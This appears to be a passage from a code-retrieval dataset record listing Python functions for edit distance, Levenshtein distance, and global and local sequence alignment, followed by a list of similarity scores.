cases\n\n # fill table\n for i in range(m + 1):\n for j in range(n + 1):\n if i == 0:\n # str_1 is empty, or we have not selected any substring of it\n sub[i][j] = j # the difference is all of str_2, equivalent to len(str_2) = j removals\n elif j == 0:\n # str_2 is empty, or we have not selected any substring of it\n sub[i][j] = i # the difference is all of str_1, equivalent to len(str_1) = i removals\n elif str_1[i - 1] == str_2[j - 1]:\n # last chars are equal, so no edits needed; continue for sub-problems\n sub[i][j] = sub[i - 1][j - 1]\n else:\n # last chars are not equal, solve for all 3 subproblems\n insert_char = sub[i][j - 1]\n remove_char = sub[i - 1][j]\n replace_char = sub[i - 1][j - 1]\n sub[i][j] = 1 + min(insert_char, remove_char, replace_char)\n\n return sub[m][n] # solution lies in last cell", "def edit_distance(s1: str, s2: str) -> int:\n # dp[a][b] is the edit distance between s1[:a] and s2[:b]\n dp = [[0 for _ in range(len(s2) + 1)] for _ in range(len(s1) + 1)]\n\n for i in range(len(s1) + 1):\n for j in range(len(s2) + 1):\n dp[i][j] = 0\n\n for i in range(len(s1) + 1):\n for j in range(len(s2) + 1):\n # The two base cases: the empty string compared to another string\n # always has the edit distance of the length of the other string,\n # because you just insert all of the characters from the other\n # string\n if i == 0:\n dp[i][j] = j\n elif j == 0:\n dp[i][j] = i\n # If the characters are equal, we don't add anything to the edit\n # distance\n elif s1[i - 1] == s2[j - 1]:\n dp[i][j] = dp[i - 1][j - 1]\n # We have 3 cases when the characters aren't equal: we have an\n # insertion, a deletion, or a substitution.\n else:\n dp[i][j] = min(dp[i - 1][j], dp[i][j - 1],\n dp[i - 1][j - 1]) + 1\n return dp[-1][-1]", "def needleman_wunsch(\n seq1, seq2, match=1, mismatch=-1, gap_open=-5, gap_extend=-3, at_genome_start=False\n):\n alignments = pairwise2.align.globalms(\n seq1,\n seq2,\n match,\n mismatch,\n gap_open,\n gap_extend,\n )\n # Alignments is a list of tuples. Each tuple has length 5. 
Entries:\n # 0: seq1 alignment (ie with dashes for indels)\n # 1: seq2 alignment\n # 2: alignment score\n # 3, 4: begin and end of the alignment (not used here)\n if len(alignments) == 1:\n return alignments[0][0], alignments[0][1]\n\n if at_genome_start:\n best_pos = last_gap_end_in_string(alignments[0][1])\n else:\n best_pos = alignments[0][1].find(\"-\")\n\n best = alignments[0]\n\n for a in alignments[1:]:\n if at_genome_start:\n gap_pos = last_gap_end_in_string(a[1])\n else:\n gap_pos = a[1].find(\"-\")\n\n if gap_pos > best_pos:\n best = a\n best_pos = gap_pos\n\n return best[0], best[1]", "def edit_distance_dp(str1, str2):\n rows = len(str1) + 1\n cols = len(str2) + 1\n dp_table = [[0 for j in range(cols)] for i in range(rows)]\n\n for row in range(rows):\n for col in range(cols):\n if row == 0 or col == 0:\n dp_table[row][col] = max(row, col)\n \n elif str1[row-1] == str2[col-1]:\n dp_table[row][col] = dp_table[row-1][col-1]\n \n else:\n insert = dp_table[row-1][col]\n delete = dp_table[row][col-1]\n replace = dp_table[row-1][col-1]\n \n dp_table[row][col] = min(insert, delete, replace) + 1\n\n return dp_table[-1][-1]", "def doc_doc_similarity(matrix_a, matrix_b):\n assert matrix_a.shape[1] == matrix_b.shape[0], \"Mismatched shape between matrix A and matrix B\"\n numerator = np.dot(matrix_a, matrix_b)\n assert numerator.shape == (matrix_a.shape[0], matrix_b.shape[1]), numerator.shape\n denominator = np.sqrt(np.sum(matrix_a ** 2, axis=1))[:, np.newaxis] * np.sqrt(\n np.sum(matrix_b.T ** 2, axis=1))[:, np.newaxis].T\n assert (denominator > 0).all(), \"Denominator is zero {}\".format(denominator)\n similarity_matrix = np.multiply(numerator, 1 / denominator)\n return similarity_matrix", "def levenshtein(str1, str2, normalise=False):\n\ttmp = Levenshtein.distance(str1, str2)\n\tif(normalise) and (len(str1) + len(str2)): tmp /= max(len(str1), len(str2))\n\treturn tmp", "def get_alphabet_similarity_matrix(self):\n distance_matrix = numpy.zeros((len(self.alphabet), len(self.alphabet)))\n numpy.fill_diagonal(distance_matrix, 0)\n for index_one, descriptor_one in enumerate(self.descriptors):\n for index_two, descriptor_two in enumerate(self.descriptors):\n distance = descriptor_one - descriptor_two\n squared_distance = numpy.dot(distance, distance)\n distance_matrix[index_one, index_two] = squared_distance\n distance_matrix /= 2. * (self.sigma_amino_acid ** 2)\n return numpy.exp(-distance_matrix)", "def match_matrices(first_matrix_df, second_matrix_df):\n\n first_matrix_array = first_matrix_df.to_numpy()\n second_matrix_array = second_matrix_df.to_numpy()\n\n first_matrix_rows = list(first_matrix_df.index)\n first_matrix_columns = list(first_matrix_df)\n\n second_matrix_rows = list(second_matrix_df.index)\n second_matrix_columns = list(second_matrix_df)\n\n if first_matrix_rows == second_matrix_rows and first_matrix_columns == second_matrix_columns:\n print(\"They match!\")\n\n else:\n print(\"They don't match. 
Re-arranging ...\")\r\n\r\n desired_permutation = []\r\n for item in second_matrix_columns:\r\n ind = first_matrix_columns.index(item) # get the correct order of image IDs from distance matrix columns\r\n desired_permutation.append(ind)\r\n\r\n idx = np.empty_like(desired_permutation)\r\n idx[desired_permutation] = np.arange(len(desired_permutation))\r\n second_matrix_array[:] = second_matrix_array[:, idx]\r\n second_matrix_array[:] = second_matrix_array[idx, :]\r\n\r\n second_matrix_df = pd.DataFrame(second_matrix_array, columns=first_matrix_columns, index=first_matrix_rows)\r\n\r\n return first_matrix_df, second_matrix_df", "def token_stopword_match(a, b, threshold=0.5):\r\n \r\n pos_a = map(get_wordnet_pos, nltk.pos_tag(tokenizer(a)))\r\n pos_b = map(get_wordnet_pos, nltk.pos_tag(tokenizer(b)))\r\n a = [lemmatizer.lemmatize(token.lower(), pos) for token, pos in pos_a\r\n if pos == wordnet.NOUN and token.lower() not in stopwords]\r\n b = [lemmatizer.lemmatize(token.lower(), pos) for token, pos in pos_b\r\n if pos == wordnet.NOUN and token.lower() not in stopwords]\r\n \r\n \r\n # Calculate Jaccard similarity\r\n ratio = len(set(a).intersection(b)) / float(len(set(a).union(b)))\r\n\r\n # return (ratio >= threshold)\r\n return (ratio)", "def levenshtein(w1, w2):\n\n if len(w1) < len(w2):\n # check if length of word1 is smaller than word2.\n # if so, call function and switch parameters\n return levenshtein(w2, w1)\n elif len(w1) == 0:\n # if the length of word1 equals 0, that means that\n # the Lev' distance is the length of word2\n return len(w2)\n elif len(w2) == 0:\n # if the length of word2 equals 0, that means that\n # the Lev' distance is the length of word1\n return len(w1)\n elif w1 == w2:\n # check if words are simply the same\n return 0\n\n # thanks to the check above, we can assume that w2 is the shorter word\n # we use this information to determine the range of 'previous'\n previous = range(len(w2) + 1)\n\n # iterate over the characters of the first word\n for a, char1 in enumerate(w1):\n current = [a + 1]\n # iterate over the characters of the second word\n for b, char2 in enumerate(w2):\n inserts = previous[b + 1] + 1\n deletions = current[b] + 1\n subs = previous[b] + (char1 != char2)\n current.append(min(inserts, deletions, subs))\n previous = current\n return previous[-1]", "def compute_alignment_matrix(seq_x, seq_y, scoring_matrix, global_flag):\n len_x = len(seq_x)\n len_y = len(seq_y)\n\n alignment_matrix = [[0 for col in range(len_y + 1)] for row in range(len_x + 1)]\n\n for row in range(1, len_x + 1):\n possible_score = alignment_matrix[row-1][0] + scoring_matrix[\"-\"][seq_x[row-1]]\n if global_flag:\n alignment_matrix[row][0] = possible_score\n else:\n alignment_matrix[row][0] = max(0, possible_score)\n\n for col in range(1, len_y+1):\n possible_score = alignment_matrix[0][col-1] + scoring_matrix[\"-\"][seq_y[col-1]]\n if global_flag:\n alignment_matrix[0][col] = possible_score\n else:\n alignment_matrix[0][col] = max(0, possible_score)\n\n for row in range(1, len_x+1):\n for col in range(1, len_y+1):\n route1 = alignment_matrix[row-1][col-1] + scoring_matrix[seq_x[row-1]][seq_y[col-1]]\n route2 = alignment_matrix[row-1][col] + scoring_matrix[seq_x[row -1]][\"-\"]\n route3 = alignment_matrix[row][col-1] + scoring_matrix[\"-\"][seq_y[col-1]]\n possible_score = max(route1, route2, route3)\n if global_flag:\n alignment_matrix[row][col] = possible_score\n else:\n alignment_matrix[row][col] = max(0, possible_score)\n\n #for row in alignment_matrix:\n # print row\n\n return alignment_matrix", "def 
compute_backpointers(s0, s1): #Tillverkar en array med backpointrs\r\n if s0 == None or s1 == None:\r\n raise Exception('Both s0 and s1 have to be set')\r\n rows = len(s0)+1 # antalet rader\r\n columns = len(s1)+1 # antalet kolumner\r\n\r\n ####### Tillverkar Levenshtein matrisen ########\r\n # Gör en tom matris med nollor\r\n distance = [[0 for y in range(len(s1)+1)] for x in range(len(s0)+1)]\r\n\r\n # Gör de yttre lagrerna i matrisen 0 -> len(str) vertikalt och horisontellt\r\n for i in range(1,rows):\r\n distance[i][0] = i\r\n for i in range(1,columns):\r\n distance[0][i] = i\r\n\r\n # Beräknar kostnaderna för varje plats inne i matrisen och sätter in dem\r\n # kollar om bokstaven på indexet i de två orden är samma i sådana fall kostar det 0\r\n # och skall ha samma värde som diagonalt innan, annars kostar det 1 från över eller underself.\r\n for column in range(1,columns):\r\n for row in range(1,rows): # kolla varje rad i vare column\r\n if s0[row-1] == s1[column -1]: # om det är samma bokstav kostar det 0\r\n c = 0\r\n else: # annars kostar det 2\r\n c = 2\r\n distance[row][column] = min(distance[row-1][column] + 1,distance[row][column-1] + 1,distance[row-1][column-1] + c)\r\n # raden över säger att det minsta värdet av över eller bredvid + 1 eller diagonalt innan plus (0 eller 2)\r\n # skall sättas in på platsen i matrisen.\r\n\r\n # det minsta avståndet är\r\n cost = distance[row][column]\r\n print(\"totalkostnaden är\")\r\n print(cost)\r\n\r\n\r\n ####### Tillverkar backptr-matrisen ########\r\n # Tillverkar en tom matris med [0,0] för till backptr-matrisen\r\n backptr = [[[0, 0] for y in range(len(s1)+1)] for x in range(len(s0)+1)]\r\n\r\n # går igenom platserna i Levenshtein matrisen bakirfrån\r\n for column in range(columns-1,0,-1):\r\n for row in range(rows-1,0,-1):\r\n # Om värdet till vänster är det minsta: peka vänster\r\n if distance[row][column-1] == min(distance[row-1][column-1],distance[row][column-1],distance[row-1][column]):\r\n backptr[row][column][0] = row\r\n backptr[row][column][1] = column -1\r\n # Om värdet över är det minsta: peka upp\r\n if distance[row-1][column] == min(distance[row-1][column-1],distance[row][column-1],distance[row-1][column]):\r\n backptr[row][column][0] = row -1\r\n backptr[row][column][1] = column\r\n # om värdet diagonalt är minst: peka på diagonalt\r\n if distance[row-1][column-1] == min(distance[row-1][column-1],distance[row][column-1],distance[row-1][column]):\r\n backptr[row][column][0] = row-1\r\n backptr[row][column][1] = column -1\r\n\r\n # Gör yttervärdena i matrisen, (OBS behövs ej)\r\n for i in range(0,rows):\r\n j = i-1\r\n backptr[i][0][0] = j\r\n backptr[i][0][1] = 0\r\n for i in range(0,columns):\r\n j = i-1\r\n backptr[0][i][1] = j\r\n backptr[0][i][0] = 0\r\n\r\n return backptr", "def edit_distance(left_word: str, right_word: str) -> int:\n if len(left_word) != len(right_word):\n raise ValueError(\"Word ladder words must be same length\")\n\n distance = 0;\n for i in range(len(left_word)):\n if left_word[i] != right_word[i]:\n distance += 1\n return distance", "def distances(a, b):\n # 1. Set up a list of lists\n matrix = [[None for i in range(len(b)+1)] for j in range(len(a)+1)]\n\n # 2. Add value for base cases (1st row/column)\n ## First position is always None\n matrix[0][0] = (0, None)\n\n ## 1st row and column\n for i in range(1, len(b) + 1):\n matrix[0][i] = (i, Operation.INSERTED)\n\n\n for j in range(1, len(a) + 1):\n matrix[j][0] = (j, Operation.DELETED)\n\n\n # 3. 
Add other values - find min of all options\n for i in range(1, len(a)+1):\n for j in range(1, len(b)+1):\n\n if a[i-1] == b[j-1]:\n cost = matrix[i-1][j-1][0]\n operation = Operation.SUBSTITUTED\n matrix[i][j] = (cost, operation)\n\n else:\n # Calculate substitutin, deletion and insertion\n substitution = matrix[i - 1][j - 1][0] + 1\n deletion = matrix[i-1][j][0] + 1\n insertion = matrix[i][j-1][0] + 1\n\n # Compare\n compare = [deletion, insertion, substitution]\n cost = min(compare)\n op = compare.index(min(compare))\n if op == 0:\n operation = Operation.DELETED\n if op == 1:\n operation = Operation.INSERTED\n if op == 2:\n operation = Operation.SUBSTITUTED\n\n matrix[i][j] = (cost, operation)\n return matrix", "def word_rotator_similarity(x, y):\n return 1 - word_rotator_distance(x, y)", "def compute_global_alignment(seq_x, seq_y, scoring_matrix, alignment_matrix):\n\n align_x = \"\"\n align_y = \"\"\n\n len_x = len(seq_x)\n len_y = len(seq_y)\n\n score = alignment_matrix[len_x][len_y]\n\n while len_x > 0 and len_y > 0:\n if alignment_matrix[len_x][len_y] == alignment_matrix[len_x -1][len_y - 1] + scoring_matrix[seq_x[len_x-1]][seq_y[len_y-1]]:\n align_x = seq_x[len_x-1] + align_x\n align_y = seq_y[len_y-1] + align_y\n len_x -= 1\n len_y -= 1\n elif alignment_matrix[len_x][len_y] == alignment_matrix[len_x -1][len_y] + scoring_matrix[seq_x[len_x-1]][\"-\"]:\n align_x = seq_x[len_x-1] + align_x\n align_y = \"-\" + align_y\n len_x -= 1\n else:\n align_x = \"-\" + align_x\n align_y = seq_y[len_y-1] + align_y\n len_y -= 1\n\n while len_x > 0:\n align_x = seq_x[len_x-1] + align_x\n align_y = \"-\" + align_y\n len_x -= 1\n\n while len_y > 0:\n align_x = \"-\" + align_x\n align_y = seq_y[len_y-1] + align_y\n len_y -= 1\n\n return (score, align_x, align_y)", "def local_aligner_score(s1, s2, gap_penalty=-1, gap_opening_penalty=-10, edit_function=utils.sub_matrices_distance, matrix=MatrixInfo.pam120):\n\n n_row = len(s1) + 1\n n_col = len(s2) + 1\n # Creates a matrix where the partial scores are stored.\n S = np.zeros((n_row, n_col))\n # Creates a matrix (stored as DataFrame) where the optimal movements are\n # stored.\n backtrack_matrix = pd.DataFrame(\"\", index=np.arange(n_row), columns=np.arange(n_col))\n\n # Initialize the first column and row of the matrices.\n # In the local aligner, we stop when a 0 is encountered, which corresponds to an \"X\"\n for i in range(n_row):\n backtrack_matrix.set_value(i, 0, \"X\")\n\n for j in range(n_col):\n backtrack_matrix.set_value(0, j, \"X\")\n \n # small optimization: keep track of the maximum score encountered so far, and its indices.\n score_max = 0\n i_max = 0\n j_max = 0\n \n for i in range(1, n_row):\n for j in range(1, n_col):\n # Compute the possible movements, and then keeps the best.\n s1_gap = max([S[i - k, j] + utils.gap_function(gap_penalty, gap_opening_penalty, k) for k in range(1, i+1)])\n s2_gap = max([S[i, j - k] + utils.gap_function(gap_penalty, gap_opening_penalty, k) for k in range(1, j+1)])\n mut = S[i - 1, j - 1] + edit_function(s1[i - 1], s2[j - 1], matrix=matrix)\n # In the local aligner, don't accept negative scores!\n S[i, j] = max(s1_gap, s2_gap, mut, 0)\n\n if S[i, j] >= score_max:\n score_max = S[i, j]\n i_max = i\n j_max = j\n # Write in the matrix the movement that lead to that cell, as a string.\n # e.g. 
\"HV\" means that horizontal and vertical movements were the\n # best.\n # In local alignment, \"X\" means that 0 was the maximum value, and all the movements gave a negative score.\n # The backtracking will stop when an \"X\" is encountered.\n backtrack_matrix.set_value(i, j, \"\".join(check_argmax([s1_gap, s2_gap, mut, 0])))\n \n return [score_max, S, backtrack_matrix, i_max, j_max]", "def calculate_edit_distance(str1, str2, pos1, pos2):\n \n result = None\n \n # If either of the strings is an empty string, return the length\n # of the other string. \n if pos1 == 0:\n result = pos2\n elif pos2 == 0:\n result = pos1\n \n # Check if the last character of the strings are identical. If\n # they are, move on to the next character.\n elif str1[pos1-1] == str2[pos2-1]:\n result = calculate_edit_distance(str1, str2, pos1-1, pos2-1)\n\n # If the last characters are not the same, one character is\n # different between these two strings at the pos 1 and 2. Move on\n # to the next character, and add one to the distance.\n else:\n # Iteratively, find which case holds true. The options are:\n # - insertion in string1\n # - deletion in string1\n # - substitution between strings 1 and 2 at pos1 and pos2.\n # Choose the minimum of the three cases.\n result = 1 + min(calculate_edit_distance(str1, str2, pos1, pos2-1),\n calculate_edit_distance(str1, str2, pos1-1, pos2),\n calculate_edit_distance(str1, str2, pos1-1, pos2-1))\n \n return result", "def edit_distance (str1, str2):\n str1.strip()\n str2.strip()\n if len(str1) != len(str2):\n raise ValueError(\"Strings have to be of equal lengths: \" + str1 + \" and \" + str2)\n\n return sum(bit=='1' for bit in bin(int(binascii.hexlify(xorstr(str1, str2)), 16)))", "def get_exp_mismatch_matrix(k, _lambda):\n\n words = get_words(k)\n N = len(words)\n\n exp_mismatch_matrix = np.zeros((N, N))\n for i in range(N):\n exp_mismatch_matrix[i,i] = 1\n for j in range(i+1, N):\n exp_mismatch_matrix[i,j] = _lambda**Levenshtein.hamming(words[i], words[j])\n exp_mismatch_matrix[j,i] = exp_mismatch_matrix[i,j]\n\n return exp_mismatch_matrix" ]
[ "0.6711283", "0.6683752", "0.6674949", "0.6592512", "0.6581954", "0.64532", "0.64532", "0.6445244", "0.6432772", "0.64265794", "0.63696915", "0.6358784", "0.62909234", "0.62251955", "0.6190301", "0.61244994", "0.6103599", "0.6082008", "0.60701114", "0.60523444", "0.60067487", "0.5975594", "0.5952714", "0.5941617", "0.5930747", "0.59077793", "0.59071326", "0.58838445", "0.5841615", "0.58236533", "0.58162755", "0.57882506", "0.5785298", "0.5772163", "0.57442707", "0.57347715", "0.5734288", "0.5727408", "0.5720689", "0.57201076", "0.570129", "0.5696617", "0.5694825", "0.56810385", "0.56785566", "0.56697315", "0.56646794", "0.5649311", "0.5616305", "0.56147856", "0.5597037", "0.5596028", "0.55936545", "0.55810976", "0.5573607", "0.55526584", "0.5544162", "0.55427736", "0.5542102", "0.55358046", "0.5522649", "0.5522535", "0.55211467", "0.5511286", "0.5509839", "0.54985833", "0.5491787", "0.5464485", "0.5457534", "0.5441571", "0.54398656", "0.54377073", "0.543698", "0.54304564", "0.5430401", "0.5422672", "0.5416042", "0.541154", "0.5394928", "0.53935045", "0.5393371", "0.5392562", "0.5377311", "0.53746617", "0.5370443", "0.53660446", "0.53582764", "0.535582", "0.5343513", "0.5341627", "0.5337994", "0.5335268", "0.53192186", "0.53174734", "0.53093535", "0.5308145", "0.5304678", "0.5300798", "0.5298161", "0.5295226" ]
0.6989441
0
Compute "tcrdist" distance between two TCR CDR3 sequences. Using default weight, gap penalty, ntrim and ctrim is equivalent to the original distance published in Dash et al, (2017). By setting ntrim and ctrim to 0 and adjusting the dist_weight, it is also possible to compute the CDR1/2 loop distances which can be combined with the CDR3 distance for overall distance. See tcrdist2 package for details.
def nb_tcrdist(seq_vec1, seq_vec2, distance_matrix=tcr_nb_distance_matrix, dist_weight=3, gap_penalty=4, ntrim=3, ctrim=2, fixed_gappos=True): q_L = seq_vec1.shape[0] s_L = seq_vec2.shape[0] if q_L == s_L: """No gaps: substitution distance""" tmp_dist = 0 for i in range(ntrim, q_L - ctrim): tmp_dist += distance_matrix[seq_vec1[i], seq_vec2[i]] return tmp_dist * dist_weight short_len = min(q_L, s_L) len_diff = abs(q_L - s_L) if fixed_gappos: """If we are not aligning, use a fixed gap position relative to the start of the CDR3 that reflects the typically longer and more variable-length contributions to the CDR3 from the J than from the V. For a normal-length CDR3 this would be after the Cys+5 position (ie, gappos = 6; align 6 rsds on N-terminal side of CDR3). Use an earlier gappos if lenshort is less than 11.""" min_gappos = min(6, 3 + (short_len - 5) // 2) max_gappos = min_gappos else: """The CYS and the first G of the GXG are 'aligned' in the beta sheet the alignment seems to continue through roughly CYS+4 ie it's hard to see how we could have an 'insertion' within that region gappos=1 would be a insertion after CYS gappos=5 would be a insertion after CYS+4 (5 rsds before the gap) the full cdr3 ends at the position before the first G so gappos of len(shortseq)-1 would be gap right before the 'G' shifting this back by 4 would be analogous to what we do on the other strand, ie len(shortseq)-1-4""" min_gappos = 5 max_gappos = short_len - 1 - 4 while min_gappos > max_gappos: min_gappos -= 1 max_gappos += 1 min_dist = -1 # min_count = -1 for gappos in range(min_gappos, max_gappos + 1): tmp_dist = 0 # tmp_count = 0 remainder = short_len - gappos for n_i in range(ntrim, gappos): """n_i refers to position relative to N term""" # print (n_i, shortseq[i], longseq[i], distance_matrix[shortseq[i]+longseq[i]]) tmp_dist += distance_matrix[seq_vec1[n_i], seq_vec2[n_i]] # tmp_count += 1 #print('sequence_distance_with_gappos1:', gappos, remainder, dist[seq_i]) for c_i in range(ctrim, remainder): """c_i refers to position relative to C term, counting upwards from C term""" tmp_dist += distance_matrix[seq_vec1[q_L - 1 - c_i], seq_vec2[s_L - 1 - c_i]] # tmp_count += 1 #print('sequence_distance_with_gappos2:', gappos, remainder, dist[seq_i]) if tmp_dist < min_dist or min_dist == -1: min_dist = tmp_dist # min_count = tmp_count if min_dist == 0: break """Note that weight_cdr3_region is not applied to the gap penalty""" return min_dist * dist_weight + len_diff * gap_penalty
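A minimal usage sketch for the function above (not part of the dataset row). It assumes nb_tcrdist and tcr_nb_distance_matrix are in scope as defined above, and that the row/column ordering of tcr_nb_distance_matrix matches the alphabet below; encode_cdr3 and the example sequences are hypothetical.

import numpy as np

alphabet = 'ARNDCQEGHILKMFPSTWYV'  # assumed ordering of tcr_nb_distance_matrix
aa_to_idx = {aa: i for i, aa in enumerate(alphabet)}

def encode_cdr3(seq):
    # Map a CDR3 string to the integer index vector nb_tcrdist expects.
    return np.array([aa_to_idx[aa] for aa in seq], dtype=np.int16)

# Equal lengths: substitution distance over the core positions
# (ntrim/ctrim removed at the ends), scaled by dist_weight.
d_sub = nb_tcrdist(encode_cdr3('CASSLAPGATNEKLFF'), encode_cdr3('CASSLAPGTTNEKLFF'))

# Unequal lengths: the shorter sequence is gapped (at a fixed position by
# default) and each indel position adds gap_penalty on top of the weighted
# substitution distance.
d_gap = nb_tcrdist(encode_cdr3('CASSLAPGATNEKLFF'), encode_cdr3('CASSLAPGTNEKLFF'))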
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def _nb_vector_tcrdist(indices, seqs_mat, seqs_L, distance_matrix=tcr_nb_distance_matrix, dist_weight=3, gap_penalty=4, ntrim=3, ctrim=2, fixed_gappos=True):\n assert seqs_mat.shape[0] == seqs_L.shape[0]\n\n dist = np.zeros(indices.shape[0], dtype=np.int16)\n for ind_i in nb.prange(indices.shape[0]):\n query_i = indices[ind_i, 0]\n seq_i = indices[ind_i, 1]\n q_L = seqs_L[query_i]\n s_L = seqs_L[seq_i]\n if q_L == s_L:\n \"\"\"No gaps: substitution distance\"\"\"\n for i in range(ntrim, q_L - ctrim):\n dist[ind_i] += distance_matrix[seqs_mat[query_i, i], seqs_mat[seq_i, i]] * dist_weight\n continue\n\n short_len = min(q_L, s_L)\n len_diff = abs(q_L - s_L)\n if fixed_gappos:\n min_gappos = min(6, 3 + (short_len - 5) // 2)\n max_gappos = min_gappos\n else:\n min_gappos = 5\n max_gappos = short_len - 1 - 4\n while min_gappos > max_gappos:\n min_gappos -= 1\n max_gappos += 1\n min_dist = -1\n # min_count = -1\n for gappos in range(min_gappos, max_gappos + 1):\n tmp_dist = 0\n # tmp_count = 0\n remainder = short_len - gappos\n for n_i in range(ntrim, gappos):\n \"\"\"n_i refers to position relative to N term\"\"\"\n # print (n_i, shortseq[i], longseq[i], distance_matrix[shortseq[i]+longseq[i]])\n tmp_dist += distance_matrix[seqs_mat[query_i, n_i], seqs_mat[seq_i, n_i]]\n # tmp_count += 1\n #print('sequence_distance_with_gappos1:', gappos, remainder, dist[seq_i])\n for c_i in range(ctrim, remainder):\n \"\"\"c_i refers to position relative to C term, counting upwards from C term\"\"\"\n tmp_dist += distance_matrix[seqs_mat[query_i, q_L - 1 - c_i], seqs_mat[seq_i, s_L - 1 - c_i]]\n # tmp_count += 1\n #print('sequence_distance_with_gappos2:', gappos, remainder, dist[seq_i])\n if tmp_dist < min_dist or min_dist == -1:\n min_dist = tmp_dist\n # min_count = tmp_count\n if min_dist == 0:\n break\n dist[ind_i] = min_dist * dist_weight + len_diff * gap_penalty\n return dist", "def computeCDR3PWDist(seqs, gap_open=3, gap_extend=3, matrix=parasail.blosum62, useIdentity=False):\n cache = CachedNWDistance(seqs, matrix=matrix, gap_open=gap_open, gap_extend=gap_extend, useIdentity=useIdentity)\n\n indices = cache.indices()\n L = indices.shape[0]\n pwdist = np.nan * np.zeros((L, L))\n \n for i, j in itertools.product(range(L), range(L)):\n \n if i <= j:\n d = cache.metric(indices[i], indices[j])\n pwdist[i, j] = d\n pwdist[j, i] = d\n\n pwdist = pd.DataFrame(pwdist, columns=cache.elements, index=cache.elements)\n return pwdist", "def distance_3D(c1, c2):\n return np.sqrt((c1[0] - c2[0]) ** 2 + (c1[1] - c2[1]) ** 2 + (c1[2] - c2[2]) ** 2)", "def test_cdtw(self):\n np.random.seed(1)\n M = 100\n N = 150\n t1 = np.linspace(0, 1, M)\n X = np.zeros((M, 2), dtype=np.float32)\n X[:, 0] = np.cos(2*np.pi*t1)\n X[:, 1] = np.sin(8*np.pi*t1)\n ## Sample an element from a dictionary of parameterizations\n ## and use this parameterization to interpolate the original\n ## time series\n D = linmdtw.alignmenttools.get_parameterization_dict(N)\n s = linmdtw.alignmenttools.sample_parameterization_dict(D, 4)\n Y = linmdtw.alignmenttools.get_interpolated_euclidean_timeseries(X, s)\n\n cost10 = linmdtw.get_path_cost(X, Y, linmdtw.cdtw(X, Y, 10))\n cost10_T = linmdtw.get_path_cost(Y, X, linmdtw.cdtw(Y, X, 10))\n assert(cost10 == cost10_T)\n cost4 = linmdtw.get_path_cost(X, Y, linmdtw.cdtw(X, Y, 4))\n cost4_T = linmdtw.get_path_cost(Y, X, linmdtw.cdtw(Y, X, 4))\n assert(cost4 == cost4_T)\n assert(cost10 < cost4)\n assert(cost10_T < cost4_T)", "def func_c_align_split_n(self, args):\n tik_instance, ub_ori, ub_trans, n_before, n_len = 
args\n\n n_d, d_d, h_d, w_d, c_d = self.dst_shape\n dhw_d = d_d * h_d * w_d\n hw_d = h_d * w_d\n\n data_offset = n_before * self.c_0\n ub_offset = 0\n ori_nburst = dhw_d * self.c_1\n burst_len = n_len * self.c_0 // self.cp_align_len\n src_stride = (n_d - n_len) * self.c_0 // self.cp_align_len\n dst_stride = 0\n args = tik_instance, self.src_gm, ub_ori, data_offset, ub_offset, \\\n ori_nburst, burst_len, src_stride, dst_stride, self.cp_align_len\n _gm_to_ub_one(args)\n\n hwnoni = hw_d * n_len\n with tik_instance.for_range(0, d_d) as num_d:\n with tik_instance.for_range(0, self.c_1) as num_c1:\n ori_cur = num_d * self.c_1 * hwnoni * self.c_0 \\\n + num_c1 * hwnoni * self.c_0\n trans_cur = num_d * self.c_1 * hwnoni * self.c_0 \\\n + num_c1 * self.c_0\n nburst = hwnoni\n burst_len = self.c_0 // self.cp_align_len\n src_stride = 0\n dst_stride = (self.c_1 - 1) * self.c_0 // self.cp_align_len\n tik_instance.data_move(\n ub_trans[trans_cur],\n ub_ori[ori_cur],\n 0, nburst, burst_len, src_stride, dst_stride)\n\n with tik_instance.for_range(0, dhw_d) as num_dhw:\n src_cur = num_dhw * n_len * c_d\n dst_cur = num_dhw * c_d\n nburst = n_len\n burst_len = c_d // self.cp_align_len\n src_stride = 0\n dst_stride = (dhw_d - 1) * c_d // self.cp_align_len\n tik_instance.data_move(\n ub_ori[dst_cur],\n ub_trans[src_cur],\n 0, nburst, burst_len, src_stride, dst_stride)\n\n dst_offset = n_before * dhw_d * c_d\n burst_len = n_len * dhw_d * c_d // self.cp_align_len\n tik_instance.data_move(self.dst_gm[dst_offset],\n ub_ori,\n 0, 1, burst_len, 0, 0)", "def chord_dist(n1, n2):\n return min(((n2.node_id - n1.node_id) % (2 ** config.ring_size_bits)),\n ((n1.node_id - n2.node_id) % (2 ** config.ring_size_bits)),\n ) / float(2 ** config.ring_size_bits)", "def calculate_d3ct(self):\n data = deepcopy(self.ddct)\n data = data.set_index(['cell_line', 'replicate', 'Assay', 'time', 'treatment'])\n control = data.query('treatment == \"Control\"')#.reset_index(drop=True)\n tgfb = data.query('treatment == \"TGFb\"')#.reset_index(drop=True)\n control.index = control.index.droplevel(4)\n tgfb.index = tgfb.index.droplevel(4)\n return tgfb / control", "def convert_tcr(split_line, tcr_id):\n\n # Compile the necessary fields for output\n out_vals = {'sequence_id': tcr_id,\n 'sequence': split_line[params['sequence_index']], 'rev_comp': 'F',\n 'duplicate_count': split_line[params['abundance_index']]}\n\n # If the option has been set, only retain those sequences with a value equal to or greater than that threshold\n if input_args['abundance_filter']:\n if float(out_vals['duplicate_count']) < input_args['abundance_filter']:\n return\n\n # Infer productivity (using presence of CDR3 and Adaptive sequenceStatus value), take junction if there\n if split_line[params['cdr3_index']] and split_line[params['productivity']] == 'In':\n out_vals['junction_aa'] = split_line[params['cdr3_index']]\n out_vals['productive'] = 'T'\n\n # If the option to discard rearrangements lacking proper CDR3 motifs has been set, skip this entry if not C/F\n if input_args['motif_filter']:\n if out_vals['junction_aa'][0] != 'C':\n return\n elif chain == 'TRB' and out_vals['junction_aa'][-1] != 'F':\n return\n # Human TRAJ are a bit more flexible as to their junction-defining residue\n elif chain == 'TRA' and out_vals['junction_aa'][-1] not in ['F', 'W', 'C']:\n return\n\n # If the option to discard rearrangements lacking proper CDR3 motifs has been set, skip this entry if not C/F\n if input_args['junction_len_filter'] != 0:\n if len(out_vals['junction_aa']) < 
